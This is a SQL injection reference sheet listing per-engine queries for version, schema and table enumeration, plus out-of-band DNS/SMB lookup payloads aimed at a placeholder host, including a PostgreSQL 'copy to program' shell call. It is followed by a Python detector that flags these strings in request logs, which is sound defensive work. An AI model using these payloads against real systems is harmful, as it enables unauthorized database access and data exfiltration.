Once SQL injection has been identified, the next step is to enumerate the underlying database engine. Unfortunately, each database engine uses its own syntax for metadata, which makes this process highly engine-dependent.
Database     Version Info
Oracle       SELECT banner FROM v$version
             SELECT version FROM v$instance
Microsoft    SELECT @@version
PostgreSQL   SELECT version()
MySQL        SELECT @@version

Listing tables and the columns they contain:
Database     Contents Info
Oracle       SELECT * FROM all_tables
             SELECT * FROM all_tab_columns WHERE table_name = 'Table Name'
Microsoft    SELECT * FROM information_schema.tables
             SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'
PostgreSQL   SELECT * FROM information_schema.tables
             SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'
MySQL        SELECT * FROM information_schema.tables
             SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'

Database     Concatenation
Oracle       'a'||'b'
Microsoft    'a'+'b'
PostgreSQL   'a'||'b'
MySQL        'a' 'b' (space) or CONCAT('a','b')

Database     Lookup Syntax
Oracle       SELECT UTL_INADDR.get_host_address('domain')
             - requires elevated privileges
Microsoft    exec master..xp_dirtree '//domain/a'
PostgreSQL   copy (SELECT '') to program 'nslookup domain'
MySQL        These work only on Windows:
             LOAD_FILE('\\\\domain\\a')
             SELECT ... INTO OUTFILE '\\\\domain\\a'
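
From the defender's side, the metadata and lookup strings in the tables above double as detection signatures. The following is an added example, not part of the original page: it URL-decodes request lines (including values encoded more than once) and flags those strings. The function names, the engine hints and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# (category, engine hint, pattern) taken from the tables above.
# The hint says which table row matched; it is not proof of the backend engine.
SIGNATURES = [
    ("version", "Oracle", r"\bv\$(version|instance)\b"),
    ("version", "Microsoft/MySQL", r"@@version\b"),
    ("version", "PostgreSQL", r"\bversion\s*\(\s*\)"),
    ("schema", "Oracle", r"\ball_(tables|tab_columns)\b"),
    ("schema", "Microsoft/PostgreSQL/MySQL",
     r"\binformation_schema\s*\.\s*(tables|columns)\b"),
    ("dns", "Oracle", r"\butl_inaddr\s*\.\s*get_host_address\b"),
    ("dns", "Microsoft", r"\bxp_dirtree\b"),
    ("dns", "PostgreSQL", r"\bcopy\b.*\bto\s+program\b"),
    ("dns", "MySQL", r"\bload_file\s*\(|\binto\s+outfile\b"),
]
COMPILED = [(cat, eng, re.compile(rx)) for cat, eng, rx in SIGNATURES]

def normalize(raw):
    """Undo up to three layers of URL encoding, collapse whitespace, lowercase."""
    text = raw
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", text).lower()

def classify(request_line):
    """Return the sorted (category, engine hint) pairs found in one line."""
    text = normalize(request_line)
    return sorted({(cat, eng) for cat, eng, rx in COMPILED if rx.search(text)})

def scan(lines):
    """Return [(line_number, hits)] for every line with at least one hit."""
    return [(n, h) for n, line in enumerate(lines, 1) if (h := classify(line))]

# Constructed sample request lines (not from a real log).
SAMPLE_LOG = [
    "GET /item?id=1 HTTP/1.1",
    "GET /item?q=SELECT%20banner%20FROM%20v%24version HTTP/1.1",
    "GET /item?q=SELECT%2520*%2520FROM%2520information_schema.tables HTTP/1.1",
    "GET /item?q=exec%20master..xp_dirtree%20%27//domain/a%27 HTTP/1.1",
    "GET /search?q=release+version+notes HTTP/1.1",
]

if __name__ == "__main__":
    for line_no, hits in scan(SAMPLE_LOG):
        print(line_no, hits)
```

A hit in the "dns" category is worth correlating with outbound DNS or SMB traffic from the database host, since those rows only produce a result when the server can reach the network.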